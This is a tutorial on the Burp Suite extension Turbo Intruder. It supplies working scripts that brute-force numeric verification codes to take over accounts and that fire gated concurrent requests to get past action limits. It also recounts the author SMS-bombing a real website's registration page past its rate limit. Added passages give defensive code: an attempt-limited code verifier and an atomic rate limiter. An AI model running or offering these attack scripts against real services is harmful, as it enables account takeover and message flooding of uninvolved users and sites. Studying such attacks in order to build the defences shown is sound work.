
Title: Burp Suite plugin Turbo Intruder: Detailed explanation of breaking through rate limits


1. Introduction to plug-in

Turbo Intruder is a Burp Suite extension for sending very large numbers of HTTP requests and analysing the results. It is designed to complement Burp Intruder by handling attacks that require exceptional speed, duration or complexity.

2. Plug-in principle

The first request is used to establish a connection, and all subsequent requests are sent over that same persistent (keep-alive) connection. Requests are also sent with HTTP pipelining: the next request is written to the connection while the response to the previous one is still outstanding, so the client never waits for the server's reply before sending; the client does, however, still have to read the responses in the order in which the requests were sent. Sending requests through an HTTP pipeline reaches 6000% of the speed of short connections (Connection: close).

3. Installation method

Install the Turbo Intruder plugin in Burp Suite.

4. How to use

Select the captured request and right-click it to choose "Send to turbo intruder". The request must have been captured through the Burp proxy; if it has not, the "Send to turbo intruder" menu entry is not shown.

A new window then opens. The upper part of the window holds the original HTTP request, the lower part holds the operation code, and the drop-down box in the middle lets you pick a specific operation script for the scenario. Each time the window is opened, the default is "Last code used", i.e. the script used last time.

In the request area, replace the part that is to be fuzzed with the "%s" marker. Select the appropriate operation code and click Attack at the bottom to start the attack. For details of how this is used in practice, see the usage scenarios below.

5. Usage scenarios

1. Verification code brute force

This mainly applies to mobile-phone verification, email verification-code login and password-recovery functions. Combined with user-name enumeration, brute-forcing the verification code can lead to the takeover of any user's account.

Verification code brute-force operation code:

from itertools import product

def brute_verify_code(target, engine, length):
    pattern = '1234567890'  # characters used to generate the dictionary
    # product() takes one or more iterables and yields their Cartesian product;
    # repeat=length combines pattern with itself "length" times, i.e. it yields
    # every numeric code of that many digits
    for i in product(pattern, repeat=length):
        code = ''.join(i)
        engine.queue(target.req, code)  # each code replaces the %s in the request

def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,   # address of the target
                           concurrentConnections=30,   # open 30 connections to the server
                           requestsPerConnection=100,  # send 100 requests per connection
                           pipeline=True               # enable HTTP pipelining
                           )
    brute_verify_code(target, engine, 6)  # change 6 to the number of digits in the code

def handleResponse(req, interesting):
    # only responses that do not contain "error" are added to the results table
    if 'error' not in req.response:
        table.add(req)

Demo:

Assume that Baidu's wd parameter is a numeric 6-digit verification code. Replace the parameter value with "%s", then copy the code above into the operation code area.

Click Attack to start the attack; you can see that '%s' is replaced with the generated dictionary entries. 29431 requests were completed in 31 seconds, an RPS of 949.

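The result above (one million 6-digit codes at 949 requests per second) is what a server-side check has to defend against. The following is an added example, not code from the post or from Turbo Intruder: a verifier that counts failed attempts per identifier, expires codes, and compares in constant time, plus a helper that turns the measured RPS into a worst-case enumeration time. The class and function names and the 5-attempt and 300-second values are assumptions chosen for the example.

```python
import hmac
import secrets
import time

def enumeration_seconds(digits, rps):
    """Worst-case time to try every numeric code of `digits` length at `rps`."""
    return (10 ** digits) / float(rps)

class CodeVerifier:
    """Per-identifier attempt limit + expiry + single use for numeric codes."""
    def __init__(self, max_attempts=5, ttl_seconds=300, clock=time.time):
        self.max_attempts = max_attempts
        self.ttl = ttl_seconds
        self.clock = clock                 # injectable for deterministic tests
        self._pending = {}                 # identifier -> [code, issued_at, failed]

    def issue(self, identifier, digits=6):
        # a fresh code replaces any earlier one and resets the attempt counter
        code = "".join(secrets.choice("0123456789") for _ in range(digits))
        self._pending[identifier] = [code, self.clock(), 0]
        return code

    def verify(self, identifier, candidate):
        entry = self._pending.get(identifier)
        if entry is None:
            return "no_code"
        code, issued_at, failed = entry
        if self.clock() - issued_at > self.ttl:
            del self._pending[identifier]
            return "expired"
        if failed >= self.max_attempts:
            return "locked"                # the correct code no longer helps
        if hmac.compare_digest(code.encode(), str(candidate).encode()):
            del self._pending[identifier]  # single use: a replay is rejected
            return "ok"
        entry[2] = failed + 1
        return "wrong"
```

With a 5-attempt limit the guessing success chance per issued code is 5 in 10^6, regardless of how fast the requests arrive.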

2. Concurrent testing

Concurrency (race condition) vulnerabilities are business-logic vulnerabilities found in functions that limit how many times an action may be performed, such as check-in, lottery and coupon-collection features. Concurrent requests are used to test whether the server will honour the action more than once.

Operation code for concurrent tests:

def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=30,
                           requestsPerConnection=100,
                           pipeline=False
                           )
    # queue 30 requests, one per connection (must match concurrentConnections);
    # the 'gate' argument holds back the last byte of each request until openGate is called
    for i in range(30):
        engine.queue(target.req, target.baseInput, gate='race1')
    # wait until every request tagged 'race1' is ready, then release the last byte of each
    engine.openGate('race1')
    engine.complete(timeout=60)

def handleResponse(req, interesting):
    table.add(req)

Demo: this code is shipped with the plugin as /examples/race.py.

Since concurrent testing does not modify the original request, you will probably run into the following problem: the tool's execution flow requires a '%s' field in the original request, so add "%s" anywhere in the request before attacking.

3. SMS bombing

I found a user registration page on a website for obtaining the verification code. Capture the packet that sends the verification code. We see that the mobile phone number is in a POST parameter; send this packet to Turbo Intruder. Remember to add a header such as X: %s to the request (the %s in Turbo Intruder plays the role of §s§ in Burp Intruder; although no variable is iterated here, Turbo Intruder checks for %s when it starts). This code is shipped with the plugin as /examples/race.py.

Sending the packets concurrently, you can see that most of the results have a length of 328, and 328 is the length of a successful send. The plugin thus bypasses the limit of 5 SMS messages per minute and triggers 10 verification codes within 1 second.
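Both the coupon-collection scenario and the SMS limit above fail for the same reason: the server reads a counter, checks it, and only then writes it, so requests released together by the gate all see the pre-increment value. The following is an added example, not code from the post or from Turbo Intruder, run under CPython 3 rather than inside Burp: a racy limiter beside its atomic form, driven by 30 threads released by a Barrier to mimic the gate. The class names, the 50 ms window and the phone-number key are constructed for the example.

```python
import threading
import time

class RacyLimiter:
    """Check and increment are separate steps, like SELECT followed by UPDATE."""
    def __init__(self, limit, window=0.05):
        self.limit, self.window, self.counts = limit, window, {}

    def allow(self, key):
        used = self.counts.get(key, 0)      # read the counter
        if used >= self.limit:
            return False
        time.sleep(self.window)             # stand-in for the DB round trip
        self.counts[key] = used + 1         # write based on a stale read
        return True

class AtomicLimiter(RacyLimiter):
    """Read, check and write under one lock: the equivalent of an atomic INCR."""
    def __init__(self, limit, window=0.05):
        super().__init__(limit, window)
        self._lock = threading.Lock()

    def allow(self, key):
        with self._lock:                    # serialized: no window to exploit
            used = self.counts.get(key, 0)
            if used >= self.limit:
                return False
            self.counts[key] = used + 1
            return True

def gated_burst(limiter, key, workers=30):
    """Send `workers` requests at the same instant; return how many were allowed."""
    barrier = threading.Barrier(workers)
    allowed = []
    results_lock = threading.Lock()

    def worker():
        barrier.wait()                      # everyone "sends the last byte" together
        if limiter.allow(key):
            with results_lock:
                allowed.append(key)

    threads = [threading.Thread(target=worker) for _ in range(workers)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return len(allowed)
```

With the racy limiter the burst is allowed well past the limit of 5, which is the 10-codes-in-one-second result seen above; the atomic form allows exactly 5 no matter how many requests arrive together.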
